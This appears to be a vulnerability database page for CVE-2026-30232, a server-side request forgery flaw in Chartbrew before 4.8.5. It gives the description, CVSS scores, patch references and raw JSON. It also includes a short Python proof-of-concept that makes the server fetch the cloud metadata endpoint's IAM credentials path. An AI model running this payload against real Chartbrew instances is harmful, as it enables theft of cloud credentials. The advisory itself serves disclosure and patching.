Security Vulnerability Report
CVE-2026-30232 CVSS 9.6 CRITICAL

CVE-2026-30232

Published: 2026-04-10 20:16:21
Last Modified: 2026-04-14 17:26:55

Description

Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.8.5, Chartbrew allows authenticated users to create API data connections with arbitrary URLs. The server fetches these URLs using request-promise without any IP address validation, enabling Server-Side Request Forgery attacks against internal networks and cloud metadata endpoints. This vulnerability is fixed in 4.8.5.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
Weakness
CWE-918 (Server-Side Request Forgery)

Configurations (Affected Products)

cpe:2.3:a:depomo:chartbrew:*:*:*:*:*:*:*:* - VULNERABLE
Chartbrew < 4.8.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Exploit code example for CVE-2026-30232
# Target: Chartbrew instance
# Description: Send a request to the API data connection endpoint with an internal URL.

target_url = "http://vulnerable-chartbrew-instance.com/api/connections"
malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

payload = {
    "name": "Malicious Internal Scan",
    "type": "api",
    "options": {
        "url": malicious_url,
        "method": "GET"
    }
}

headers = {
    "Content-Type": "application/json",
    "Authorization": "Bearer <VALID_USER_TOKEN>"
}

response = requests.post(target_url, json=payload, headers=headers)

if response.status_code == 200:
    print("[+] Connection created successfully. Server fetched internal metadata.")
else:
    print("[-] Failed to create connection.")

References

https://github.com/chartbrew/chartbrew/commit/9c4a7e2b02acb25f0782bd4ac1f16407d59c2df1 (Patch)
https://github.com/chartbrew/chartbrew/security/advisories/GHSA-p4rg-967r-w4cv (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30232", "sourceIdentifier": "[email protected]", "published": "2026-04-10T20:16:21.323", "lastModified": "2026-04-14T17:26:55.467", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.8.5, Chartbrew allows authenticated users to create API data connections with arbitrary URLs. The server fetches these URLs using request-promise without any IP address validation, enabling Server-Side Request Forgery attacks against internal networks and cloud metadata endpoints. This vulnerability is fixed in 4.8.5."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": 
"NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:depomo:chartbrew:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.8.5", "matchCriteriaId": "08F05A49-8201-4A07-8BE2-76EC535D7874"}]}]}], "references": [{"url": "https://github.com/chartbrew/chartbrew/commit/9c4a7e2b02acb25f0782bd4ac1f16407d59c2df1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/chartbrew/chartbrew/security/advisories/GHSA-p4rg-967r-w4cv", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}